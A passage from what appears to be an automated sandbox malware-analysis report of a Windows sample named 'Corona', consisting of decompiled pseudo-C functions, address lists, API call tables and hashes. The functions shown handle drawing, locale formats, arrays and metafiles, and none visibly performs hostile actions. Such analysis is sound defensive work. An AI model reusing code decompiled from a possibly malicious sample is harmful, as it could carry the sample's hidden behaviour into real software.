					return _t62;
				}
				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
					_t107 =  *0x42e5a4; // 0x1f
				} else {
					_t107 =  *((intOrPtr*)(__eax + 0x98));
				}
				if((_t107 & 0x00000001) == 0) {
					_t119 =  *(_t118 + 0x40);
				} else {
					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
				}
				if((_t107 & 0x00000002) == 0) {
					_t121[1] =  *(_t118 + 0x44);
				} else {
					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
				}
				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
					_t64 =  *(_t118 + 0x48);
					_t121[2] = _t64;
				} else {
					if((_t107 & 0x00000001) == 0) {
						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
						_t121[2] = _t64;
					} else {
						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
						_t121[2] = _t64;
					}
				}
				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
					_t121[3] =  *(_t118 + 0x4c);
				} else {
					if(_t65 == 0) {
						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
					} else {
						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
					}
				}
				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
				_t113 =  *0x42e5ac; // 0x0
				if(_t113 != (_t107 &  *0x42e5a8)) {
					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
				}
				_t114 =  *0x42e5ac; // 0x0
				if(_t114 != (_t107 &  *0x42e5b0)) {
					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
				}
				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
					E0041C6CC( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E0041C6B0( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
				}
				goto L29;
			}













                                  0x0042e407
                                  0x0042e40a
                                  0x0042e40c
                                  0x0042e411
                                  0x0042e58e
                                  0x0042e58e
                                  0x0042e593
                                  0x0042e5a0
                                  0x0042e5a0
                                  0x0042e41b
                                  0x0042e425
                                  0x0042e41d
                                  0x0042e41d
                                  0x0042e41d
                                  0x0042e42e
                                  0x0042e442
                                  0x0042e430
                                  0x0042e43e
                                  0x0042e43e
                                  0x0042e448
                                  0x0042e461
                                  0x0042e44a
                                  0x0042e458
                                  0x0042e458
                                  0x0042e468
                                  0x0042e4a2
                                  0x0042e4a5
                                  0x0042e470
                                  0x0042e473
                                  0x0042e497
                                  0x0042e49c
                                  0x0042e475
                                  0x0042e486
                                  0x0042e488
                                  0x0042e488
                                  0x0042e473
                                  0x0042e4ac
                                  0x0042e4b1
                                  0x0042e4f5
                                  0x0042e4b9
                                  0x0042e4c1
                                  0x0042e4ec
                                  0x0042e4c3
                                  0x0042e4d8
                                  0x0042e4d8
                                  0x0042e4c1
                                  0x0042e50d
                                  0x0042e51b
                                  0x0042e523
                                  0x0042e536
                                  0x0042e536
                                  0x0042e544
                                  0x0042e54c
                                  0x0042e55f
                                  0x0042e55f
                                  0x0042e569
                                  0x0042e589
                                  0x0042e589
                                  0x00000000

                                  APIs
                                  • MulDiv.KERNEL32(?,?,?), ref: 0042E439
                                  • MulDiv.KERNEL32(?,?,?), ref: 0042E453
                                  • MulDiv.KERNEL32(?,?,?), ref: 0042E481
                                  • MulDiv.KERNEL32(?,?,?), ref: 0042E497
                                  • MulDiv.KERNEL32(?,?,?), ref: 0042E4CF
                                  • MulDiv.KERNEL32(?,?,?), ref: 0042E4E7
                                  • MulDiv.KERNEL32(?,?,0000001F), ref: 0042E531
                                  • MulDiv.KERNEL32(?,?,0000001F), ref: 0042E55A
                                  • MulDiv.KERNEL32(00000000,?,0000001F), ref: 0042E580
                                    • Part of subcall function 0041C6CC: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041C6D9
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fadb03b94531c26f38039050984049b055dd7f4ae27ba6ba467e8c5d59c1202d
                                  • Instruction ID: c80c4a75473947645a78c850bd0f614a33c9fe372062f709cd52a0b0ed340615
                                  • Opcode Fuzzy Hash: fadb03b94531c26f38039050984049b055dd7f4ae27ba6ba467e8c5d59c1202d
                                  • Instruction Fuzzy Hash: B3516D70304751AFC720EFAAD885B6BB7E8AF49308F44481EB9D5C7352D639E881CB19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042F294, Relevance: 13.6, APIs: 9, Instructions: 122windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E0042F294(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v5;
				struct HDC__* _v12;
				struct HDC__* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				int _v36;
				struct HDC__* _t33;
				intOrPtr _t72;
				int _t74;
				intOrPtr _t80;
				int _t83;
				void* _t88;
				int _t89;
				void* _t92;
				void* _t93;
				intOrPtr _t94;

				_t92 = _t93;
				_t94 = _t93 + 0xffffffe0;
				_v5 = __ecx;
				_t74 =  *((intOrPtr*)( *__edx + 0x38))();
				if(_v5 == 0) {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t88);
				} else {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t88);
				}
				_v12 = GetDesktopWindow();
				_push(0x402);
				_push(0);
				_t33 = _v12;
				_push(_t33);
				L00406394();
				_v16 = _t33;
				_push(_t92);
				_push(0x42f3af);
				_push( *[fs:eax]);
				 *[fs:eax] = _t94;
				_v20 = SelectObject(_v16, E0041CC2C( *((intOrPtr*)(_t88 + 0x40))));
				_t89 = _v36;
				_t83 = _v32;
				PatBlt(_v16, _t89 + _t74, _t83, _v28 - _t89 - _t74, _t74, 0x5a0049);
				PatBlt(_v16, _v28 - _t74, _t83 + _t74, _t74, _v24 - _t83 - _t74, 0x5a0049);
				PatBlt(_v16, _t89, _v24 - _t74, _v28 - _v36 - _t74, _t74, 0x5a0049);
				PatBlt(_v16, _t89, _t83, _t74, _v24 - _v32 - _t74, 0x5a0049);
				SelectObject(_v16, _v20);
				_pop(_t80);
				 *[fs:eax] = _t80;
				_push(0x42f3b6);
				_push(_v16);
				_t72 = _v12;
				_push(_t72);
				L004065C4();
				return _t72;
			}





















                                  0x0042f295
                                  0x0042f297
                                  0x0042f29d
                                  0x0042f2a9
                                  0x0042f2af
                                  0x0042f2bf
                                  0x0042f2c6
                                  0x0042f2c7
                                  0x0042f2c8
                                  0x0042f2c9
                                  0x0042f2ca
                                  0x0042f2b1
                                  0x0042f2b1
                                  0x0042f2b8
                                  0x0042f2b9
                                  0x0042f2ba
                                  0x0042f2bb
                                  0x0042f2bc
                                  0x0042f2bc
                                  0x0042f2d0
                                  0x0042f2d3
                                  0x0042f2d8
                                  0x0042f2da
                                  0x0042f2dd
                                  0x0042f2de
                                  0x0042f2e3
                                  0x0042f2e8
                                  0x0042f2e9
                                  0x0042f2ee
                                  0x0042f2f1
                                  0x0042f306
                                  0x0042f312
                                  0x0042f31a
                                  0x0042f327
                                  0x0042f349
                                  0x0042f368
                                  0x0042f382
                                  0x0042f38f
                                  0x0042f396
                                  0x0042f399
                                  0x0042f39c
                                  0x0042f3a4
                                  0x0042f3a5
                                  0x0042f3a8
                                  0x0042f3a9
                                  0x0042f3ae

                                  APIs
                                  • GetDesktopWindow.USER32 ref: 0042F2CB
                                  • 72E7ACE0.USER32(?,00000000,00000402), ref: 0042F2DE
                                  • SelectObject.GDI32(?,00000000), ref: 0042F301
                                  • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0042F327
                                  • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0042F349
                                  • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0042F368
                                  • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0042F382
                                  • SelectObject.GDI32(?,?), ref: 0042F38F
                                  • 72E7B380.USER32(?,?,0042F3B6,?,?,00000000,?,005A0049,?,?,?,?,00000000,005A0049,?,?), ref: 0042F3A9
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: ObjectSelect$B380DesktopWindow
                                  • String ID:
                                  • API String ID: 989747725-0
                                  • Opcode ID: 30aac2b24cc52da349f649fef76a94a90fc29391708bb432762e63a4ea66443f
                                  • Instruction ID: 4a613b6d93d82af4a53242c0728bd10f9a549366231b97f0cec30dfe0cb3774c
                                  • Opcode Fuzzy Hash: 30aac2b24cc52da349f649fef76a94a90fc29391708bb432762e63a4ea66443f
                                  • Instruction Fuzzy Hash: 9E31FB76A00219AFDB00DEEDCC85DAFBBBDEF0A704B414469B504F7241D679AD048BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C248, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E0040C248(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40c513);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0040C0D4();
				E0040AAAC(__ebx, __edi, __esi);
				_t196 =  *0x45274c;
				if( *0x45274c != 0) {
					E0040AC84(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E0040A9FC(_t43, 0, 0x14,  &_v20);
				E00403EA0(0x452680, _v20);
				E0040A9FC(_t43, 0x40c528, 0x1b,  &_v24);
				 *0x452684 = E00407DB8(0x40c528, 0, _t196);
				E0040A9FC(_t132, 0x40c528, 0x1c,  &_v28);
				 *0x452685 = E00407DB8(0x40c528, 0, _t196);
				 *0x452686 = E0040AA48(_t132, 0x2c, 0xf);
				 *0x452687 = E0040AA48(_t132, 0x2e, 0xe);
				E0040A9FC(_t132, 0x40c528, 0x19,  &_v32);
				 *0x452688 = E00407DB8(0x40c528, 0, _t196);
				 *0x452689 = E0040AA48(_t132, 0x2f, 0x1d);
				E0040A9FC(_t132, "m/d/yy", 0x1f,  &_v40);
				E0040AD34(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E00403EA0(0x45268c, _v36);
				E0040A9FC(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E0040AD34(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E00403EA0(0x452690, _v44);
				 *0x452694 = E0040AA48(_t132, 0x3a, 0x1e);
				E0040A9FC(_t132, 0x40c55c, 0x28,  &_v52);
				E00403EA0(0x452698, _v52);
				E0040A9FC(_t132, 0x40c568, 0x29,  &_v56);
				E00403EA0(0x45269c, _v56);
				E00403E4C( &_v12);
				E00403E4C( &_v16);
				E0040A9FC(_t132, 0x40c528, 0x25,  &_v60);
				_t104 = E00407DB8(0x40c528, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E00403EE4( &_v8, 0x40c580);
				} else {
					E00403EE4( &_v8, 0x40c574);
				}
				E0040A9FC(_t132, 0x40c528, 0x23,  &_v64);
				_t111 = E00407DB8(0x40c528, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E0040A9FC(_t132, 0x40c528, 0x1005,  &_v68);
					if(E00407DB8(0x40c528, 0, _t198) != 0) {
						E00403EE4( &_v12, 0x40c59c);
					} else {
						E00403EE4( &_v16, 0x40c58c);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E004041CC();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E004041CC();
				 *0x45274e = E0040AA48(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040C51A);
				return E00403E70( &_v68, 0x10);
			}

























                                  0x0040c248
                                  0x0040c248
                                  0x0040c249
                                  0x0040c24b
                                  0x0040c250
                                  0x0040c250
                                  0x0040c252
                                  0x0040c254
                                  0x0040c254
                                  0x0040c257
                                  0x0040c25a
                                  0x0040c25b
                                  0x0040c260
                                  0x0040c263
                                  0x0040c266
                                  0x0040c26b
                                  0x0040c270
                                  0x0040c277
                                  0x0040c279
                                  0x0040c279
                                  0x0040c283
                                  0x0040c292
                                  0x0040c29f
                                  0x0040c2b4
                                  0x0040c2c3
                                  0x0040c2d8
                                  0x0040c2e7
                                  0x0040c2fa
                                  0x0040c30d
                                  0x0040c322
                                  0x0040c331
                                  0x0040c344
                                  0x0040c359
                                  0x0040c364
                                  0x0040c371
                                  0x0040c386
                                  0x0040c391
                                  0x0040c39e
                                  0x0040c3b1
                                  0x0040c3c6
                                  0x0040c3d3
                                  0x0040c3e8
                                  0x0040c3f5
                                  0x0040c3fd
                                  0x0040c405
                                  0x0040c41a
                                  0x0040c424
                                  0x0040c429
                                  0x0040c42b
                                  0x0040c444
                                  0x0040c42d
                                  0x0040c435
                                  0x0040c435
                                  0x0040c459
                                  0x0040c463
                                  0x0040c468
                                  0x0040c46a
                                  0x0040c47c
                                  0x0040c48d
                                  0x0040c4a6
                                  0x0040c48f
                                  0x0040c497
                                  0x0040c497
                                  0x0040c48d
                                  0x0040c4ab
                                  0x0040c4ae
                                  0x0040c4b1
                                  0x0040c4b6
                                  0x0040c4c3
                                  0x0040c4c8
                                  0x0040c4cb
                                  0x0040c4ce
                                  0x0040c4d3
                                  0x0040c4e0
                                  0x0040c4f3
                                  0x0040c4fa
                                  0x0040c4fd
                                  0x0040c500
                                  0x0040c512

                                  APIs
                                  • GetThreadLocale.KERNEL32(00000000,0040C513,?,?,00000000,00000000), ref: 0040C27E
                                    • Part of subcall function 0040A9FC: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040AA1A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Locale$InfoThread
                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                  • API String ID: 4232894706-2493093252
                                  • Opcode ID: bea73afcbf6b0235d83f3af1ff54531422879775edb980b2dac3df2a5b025c31
                                  • Instruction ID: 2efcfbc7ff773226d2e0f8afc23b45353f0357ef44178ef7aa86b0b0e5d41b1d
                                  • Opcode Fuzzy Hash: bea73afcbf6b0235d83f3af1ff54531422879775edb980b2dac3df2a5b025c31
                                  • Instruction Fuzzy Hash: D06184747002489BDB00EBA5DC81A9E77AADF89305F50953BB100BB3C2CA3CED459B5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040E774, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 77%
                                  			E0040E774(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				intOrPtr* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E0040E3A0(0x80070057);
				}
				_t47 =  *_t91;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L0040D154();
					return E0040E3A0(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 =  *((intOrPtr*)(_t91 + 8));
					} else {
						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L0040D5A8();
						_t113 = _t54;
						if(_t113 == 0) {
							E0040E0F8(_t100);
						}
						E0040E6CC(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E0040E6E8(_v788 - 1, _t115) != 0) {
								L0040D5C0();
								E0040E3A0(_v792);
								L0040D5C0();
								E0040E3A0( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E0040E718(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L0040D5B0();
							E0040E3A0(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L0040D5B8();
							E0040E3A0(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}





























                                  0x0040e774
                                  0x0040e780
                                  0x0040e786
                                  0x0040e788
                                  0x0040e792
                                  0x0040e799
                                  0x0040e799
                                  0x0040e79e
                                  0x0040e7ac
                                  0x0040e925
                                  0x0040e92c
                                  0x0040e92d
                                  0x00000000
                                  0x0040e7b2
                                  0x0040e7b5
                                  0x0040e7c7
                                  0x0040e7b7
                                  0x0040e7bc
                                  0x0040e7bc
                                  0x0040e7d6
                                  0x0040e7e2
                                  0x0040e7e5
                                  0x0040e852
                                  0x0040e858
                                  0x0040e859
                                  0x0040e85f
                                  0x0040e860
                                  0x0040e862
                                  0x0040e867
                                  0x0040e86b
                                  0x0040e86d
                                  0x0040e86d
                                  0x0040e878
                                  0x0040e883
                                  0x0040e88e
                                  0x0040e897
                                  0x0040e89a
                                  0x0040e8b6
                                  0x0040e8bd
                                  0x0040e8c8
                                  0x0040e8df
                                  0x0040e8e4
                                  0x0040e8f8
                                  0x0040e8fd
                                  0x0040e910
                                  0x0040e910
                                  0x0040e919
                                  0x0040e89c
                                  0x0040e89c
                                  0x0040e89d
                                  0x0040e8a3
                                  0x0040e8a9
                                  0x0040e8ab
                                  0x0040e8ad
                                  0x0040e8b0
                                  0x0040e8b3
                                  0x0040e8b3
                                  0x0040e8b6
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040e8b6
                                  0x0040e7e7
                                  0x0040e7e7
                                  0x0040e7e8
                                  0x0040e7ea
                                  0x0040e7f0
                                  0x0040e7f2
                                  0x0040e801
                                  0x0040e802
                                  0x0040e80c
                                  0x0040e80d
                                  0x0040e812
                                  0x0040e81d
                                  0x0040e81e
                                  0x0040e828
                                  0x0040e829
                                  0x0040e82e
                                  0x0040e849
                                  0x0040e84b
                                  0x0040e84c
                                  0x0040e84f
                                  0x0040e84f
                                  0x00000000
                                  0x0040e7f0
                                  0x0040e7e5

                                  APIs
                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040E80D
                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040E829
                                  • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040E862
                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040E8DF
                                  • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040E8F8
                                  • VariantCopy.OLEAUT32(?), ref: 0040E92D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                  • String ID:
                                  • API String ID: 351091851-3916222277
                                  • Opcode ID: e097b3cb944edf1d61b756a614b49b7133427e9fd4d59051032893853cdbf4c2
                                  • Instruction ID: ead547984189fe65d309a8eee5043de62c2013ec8366ddb66fa11907e0112b1b
                                  • Opcode Fuzzy Hash: e097b3cb944edf1d61b756a614b49b7133427e9fd4d59051032893853cdbf4c2
                                  • Instruction Fuzzy Hash: 1151217590022D9BCB25EB5ACC80AD9B3FCAF48304F4445EAF508F7242D6389F958F65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044DE10, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetActiveWindow.USER32 ref: 0044DE23
                                  • GetWindowRect.USER32 ref: 0044DE7D
                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 0044DEB5
                                  • MessageBoxA.USER32 ref: 0044DEF6
                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0044DF6C,?,00000000,0044DF65), ref: 0044DF46
                                  • SetActiveWindow.USER32(?,0044DF6C,?,00000000,0044DF65), ref: 0044DF57
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Window$Active$MessageRect
                                  • String ID: (
                                  • API String ID: 3147912190-3887548279
                                  • Opcode ID: 00bcd1d4bc423b1884a3360468efd05c5725df83d3a06fe31686816660963fd6
                                  • Instruction ID: c8aff1c046ab8109095365b707f686f0f88113327d2826d6a70f216b70fb59e0
                                  • Opcode Fuzzy Hash: 00bcd1d4bc423b1884a3360468efd05c5725df83d3a06fe31686816660963fd6
                                  • Instruction Fuzzy Hash: 6F413F75E00204AFEB00DBE9CD96FAE77F9EB48704F15446AF501EB395D674AD008B54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041FA80, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 94%
                                  			E0041FA80(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				int _v12;
				BYTE* _v16;
				intOrPtr _v18;
				signed int _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				char _v38;
				struct tagMETAFILEPICT _v54;
				intOrPtr _v118;
				intOrPtr _v122;
				struct tagENHMETAHEADER _v154;
				intOrPtr _t103;
				intOrPtr _t115;
				struct HENHMETAFILE__* _t119;
				struct HENHMETAFILE__* _t120;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				intOrPtr _t126;

				_t124 = _t125;
				_t126 = _t125 + 0xffffff68;
				_v12 = __ecx;
				_v8 = __edx;
				_t122 = __eax;
				E0041F91C(__eax);
				 *((intOrPtr*)( *_v8 + 0xc))(__edi, __esi, __ebx, _t123);
				if(_v38 != 0x9ac6cdd7 || E0041E40C( &_v38) != _v18) {
					E0041D5BC();
				}
				_v12 = _v12 - 0x16;
				_v16 = E004026BC(_v12);
				_t103 =  *((intOrPtr*)(_t122 + 0x28));
				 *[fs:eax] = _t126;
				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:eax], 0x41fbef, _t124);
				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
				if(_v24 == 0) {
					_v24 = 0x60;
				}
				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
				_v54.mm = 8;
				_v54.xExt = 0;
				_v54.yExt = 0;
				_v54.hMF = 0;
				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t119;
				if(_t119 == 0) {
					E0041D5BC();
				}
				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
				_v54.mm = 8;
				_v54.xExt = _v122;
				_v54.yExt = _v118;
				_v54.hMF = 0;
				DeleteEnhMetaFile( *(_t103 + 8));
				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t120;
				if(_t120 == 0) {
					E0041D5BC();
				}
				 *((char*)(_t122 + 0x2c)) = 0;
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(0x41fbf6);
				return E004026DC(_v16);
			}


























                                  0x0041fa81
                                  0x0041fa83
                                  0x0041fa8c
                                  0x0041fa8f
                                  0x0041fa92
                                  0x0041fa96
                                  0x0041faa8
                                  0x0041fab2
                                  0x0041fac2
                                  0x0041fac2
                                  0x0041fac7
                                  0x0041fad3
                                  0x0041fad6
                                  0x0041fae4
                                  0x0041faf2
                                  0x0041fafc
                                  0x0041fb05
                                  0x0041fb07
                                  0x0041fb07
                                  0x0041fb27
                                  0x0041fb44
                                  0x0041fb47
                                  0x0041fb50
                                  0x0041fb55
                                  0x0041fb5a
                                  0x0041fb70
                                  0x0041fb72
                                  0x0041fb77
                                  0x0041fb79
                                  0x0041fb79
                                  0x0041fb8b
                                  0x0041fb90
                                  0x0041fb9a
                                  0x0041fba0
                                  0x0041fba5
                                  0x0041fbac
                                  0x0041fbc4
                                  0x0041fbc6
                                  0x0041fbcb
                                  0x0041fbcd
                                  0x0041fbcd
                                  0x0041fbd2
                                  0x0041fbd8
                                  0x0041fbdb
                                  0x0041fbde
                                  0x0041fbee

                                  APIs
                                  • MulDiv.KERNEL32(?,000009EC,00000000), ref: 0041FB22
                                  • MulDiv.KERNEL32(?,000009EC,00000000), ref: 0041FB3F
                                  • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0041FB6B
